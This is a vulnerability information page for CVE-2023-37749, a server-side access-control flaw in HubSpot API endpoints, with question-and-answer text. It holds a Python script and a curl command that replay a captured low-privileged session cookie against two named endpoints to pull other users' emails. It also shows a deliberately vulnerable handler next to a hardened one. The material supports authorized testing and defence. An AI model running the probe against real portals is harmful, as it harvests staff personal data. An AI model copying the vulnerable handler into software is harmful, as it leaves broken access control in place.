CVE-2023-37749
BaseFortify
Publication date: 2025-10-27
Last updated on: 2025-10-30
Assigner: MITRE
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| hubspot | hubspot | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2023-37749 is an Incorrect Access Control weakness (CWE-284) in HubSpot's REST API endpoints. For some endpoints, access control was enforced only on the client: the web UI simply does not offer the call to users without the right role, while the server does not re-check authorization when the request arrives. A low-privileged user who captures the underlying API request and replays or modifies it with their own session can therefore retrieve other users' data, such as names and email addresses, that the UI would never show them. [1, 2]
How can this vulnerability impact me?
The direct impact is unauthorized disclosure of user data (names and email addresses) to anyone holding a low-privileged account in the affected HubSpot portal. That data enables user enumeration and targeted phishing of staff, and it undermines the privacy guarantees the portal's role model is supposed to provide. [2, 1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Because the missing check is on the server, the test is to replay a low-privileged user's own requests with the paths and parameters changed and see whether other users' records come back. Capture traffic from a low-privileged account with an intercepting proxy (Burp Suite, OWASP ZAP), then resend requests to the internal endpoints named for this issue, /api/external-options/v2/pagedFetch and /api/app-users/v1/seat-purchase/downgrade-state, using the same session cookie but altered parameters (paging offsets, object identifiers). A 200 response that lists names or email addresses beyond the tester's own record confirms the flaw; curl with the captured Cookie header is enough to automate the replay. Test only against a portal you are authorized to test. On the monitoring side, alert on unexpected enumeration of these endpoints (many paged requests from one low-privileged session) and on bursts of access-control failures against them. [2, 1]
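The replay check described above, written out as an added example (this is not code from BaseFortify or HubSpot). It sends the two named endpoints with a captured low-privileged session cookie and reports a leak only when the body contains email addresses other than the tester's own. The pagedFetch query string, the JSON field name "email" and the fake responses in the test transport are assumptions; the transport is injectable so the logic can be exercised offline.

```python
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

# The two endpoints named in the Q&A above. The pagedFetch query string is an
# assumption for illustration; use the parameters your proxy actually captured.
PROBES: List[Tuple[str, str]] = [
    ("GET", "/api/external-options/v2/pagedFetch?offset=0&count=100"),
    ("GET", "/api/app-users/v1/seat-purchase/downgrade-state"),
]

# A transport takes (method, url, headers) and returns (status, body).
Transport = Callable[[str, str, Dict[str, str]], Tuple[int, str]]


def http_transport(method: str, url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Live transport: replay the captured cookie and return (status, body)."""
    req = urllib.request.Request(url, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def collect_emails(node, found: Optional[List[str]] = None) -> List[str]:
    """Walk a decoded JSON body and gather every string stored under an
    "email" key at any depth (the field name is an assumption)."""
    if found is None:
        found = []
    if isinstance(node, dict):
        for key, value in node.items():
            if key.lower() == "email" and isinstance(value, str):
                found.append(value)
            else:
                collect_emails(value, found)
    elif isinstance(node, list):
        for item in node:
            collect_emails(item, found)
    return found


def probe(base_url: str, cookie: str, own_email: str,
          send: Transport = http_transport) -> List[dict]:
    """Replay a low-privileged session against each probe endpoint.

    Only a 200 whose body lists email addresses other than the probing
    user's own is reported as vulnerable: seeing your own record is
    expected, seeing colleagues' records is the access-control failure.
    """
    headers = {"Cookie": cookie, "Accept": "application/json"}
    findings = []
    for method, path in PROBES:
        status, body = send(method, base_url.rstrip("/") + path, headers)
        others: List[str] = []
        if status == 200:
            try:
                data = json.loads(body)
            except ValueError:
                data = None  # not JSON (login page, HTML error): not a leak
            if data is not None:
                others = sorted({e for e in collect_emails(data)
                                 if e.lower() != own_email.lower()})
        findings.append({"path": path, "status": status,
                         "other_users": others, "vulnerable": bool(others)})
    return findings


if __name__ == "__main__":
    import sys
    # python probe_hubspot_acl.py https://app.hubspot.com '<Cookie header from proxy>' you@corp.example
    base, cookie, me = sys.argv[1:4]
    for f in probe(base, cookie, me):
        tag = "LEAK" if f["vulnerable"] else "ok  "
        print(f"[{tag}] {f['status']} {f['path']} other users: {len(f['other_users'])}")
```

The manual equivalent is a single curl call per endpoint with the captured header, for example `curl -s -H 'Cookie: <captured>' 'https://app.hubspot.com/api/external-options/v2/pagedFetch?offset=0&count=100'` (host and parameters are assumptions); the script only adds the "other users' emails present" decision so that a low-privileged session seeing its own record is not mistaken for a finding.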
What immediate steps should I take to mitigate this vulnerability?
HubSpot is a hosted service, so the endpoint-side fixes are the vendor's to deploy; as a HubSpot customer, confirm with HubSpot that the server-side fix is in place, review which accounts hold low-privilege seats, and monitor the endpoints above for enumeration. For the service itself, and for any application with the same shape of flaw, the fix is to move every access-control decision into trusted server-side code: on each request to /api/external-options/* and the related internal endpoints the handler must re-derive the caller's identity and role from server-side session state, refuse callers outside their own portal, and return only the fields the caller's role actually needs (least privilege on the response, not just on the route). Log and alert on access-control failures and on enumeration patterns, and rate-limit these endpoints per session to slow automated harvesting. CORS settings should be reviewed and kept minimal, but CORS is a browser-side policy, not an authorization control, and cannot substitute for the server-side checks. [2, 1]
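The vulnerable and hardened shapes of such a handler, as an added example in plain Python (not HubSpot's code and not taken from this page). `fetch_users_vulnerable` trusts that the UI only exposes the call to admins and returns every field of every user to any session; `fetch_users_hardened` decides authorization from server-side session state, enforces tenant isolation, records denials for alerting, rate-limits per session, and serialises only a role-appropriate projection. The user store, session table, role names, field names and limits are all assumptions.

```python
import time
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, List, Optional


@dataclass(frozen=True)
class User:
    user_id: int
    portal_id: int
    email: str
    first_name: str
    last_name: str
    role: str  # "admin" or "member" (assumed role model)


# Constructed in-memory stores standing in for the real user and session tables.
USERS: Dict[int, User] = {
    1: User(1, 100, "owner@corp.example", "Olive", "Owner", "admin"),
    2: User(2, 100, "sales@corp.example", "Sam", "Seller", "member"),
    3: User(3, 100, "cfo@corp.example", "Cass", "Finance", "member"),
    4: User(4, 200, "other@tenant.example", "Oscar", "Other", "admin"),
}
SESSIONS: Dict[str, int] = {"sess-admin": 1, "sess-member": 2, "sess-tenant2": 4}

AUDIT_LOG: List[str] = []  # access-control failures, fed to alerting


class AuthError(Exception):
    """401/403 equivalent; the body must not reveal which check failed."""


def fetch_users_vulnerable(session_token: str, portal_id: int) -> List[dict]:
    """Before: the UI hides this call from non-admins, the server does not.
    Any valid session, even from another portal, gets every field of every user."""
    if session_token not in SESSIONS:
        raise AuthError("unauthenticated")
    return [vars(u) for u in USERS.values() if u.portal_id == portal_id]


class RateLimiter:
    """Sliding-window limit per session key; slows automated enumeration."""

    def __init__(self, limit: int, window_s: float) -> None:
        self.limit, self.window_s = limit, window_s
        self.hits: Dict[str, Deque[float]] = defaultdict(deque)

    def allow(self, key: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        q = self.hits[key]
        while q and now - q[0] > self.window_s:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


LIMITER = RateLimiter(limit=30, window_s=60.0)


def fetch_users_hardened(session_token: str, portal_id: int) -> List[dict]:
    """After: authorization is decided here, from server-side state only."""
    if not LIMITER.allow(session_token):
        AUDIT_LOG.append(f"rate-limited token={session_token[:8]}")
        raise AuthError("too many requests")
    caller_id = SESSIONS.get(session_token)
    if caller_id is None:
        raise AuthError("unauthenticated")
    caller = USERS[caller_id]
    # Tenant isolation: a session may only ever read its own portal.
    if caller.portal_id != portal_id:
        AUDIT_LOG.append(f"cross-portal read denied user={caller.user_id} portal={portal_id}")
        raise AuthError("forbidden")
    if caller.role == "admin":
        # Least privilege even for admins: an explicit projection, never vars(u).
        return [{"id": u.user_id, "email": u.email, "name": f"{u.first_name} {u.last_name}"}
                for u in USERS.values() if u.portal_id == portal_id]
    # Members see only themselves, and only the fields the UI actually needs.
    return [{"id": caller.user_id, "name": f"{caller.first_name} {caller.last_name}"}]
```

The two handlers take the same arguments so the difference is visible in the responses alone: the vulnerable one hands a tenant-2 session the full records of portal 100, the hardened one raises and leaves an audit line, and a member session of portal 100 receives a single record without an email field.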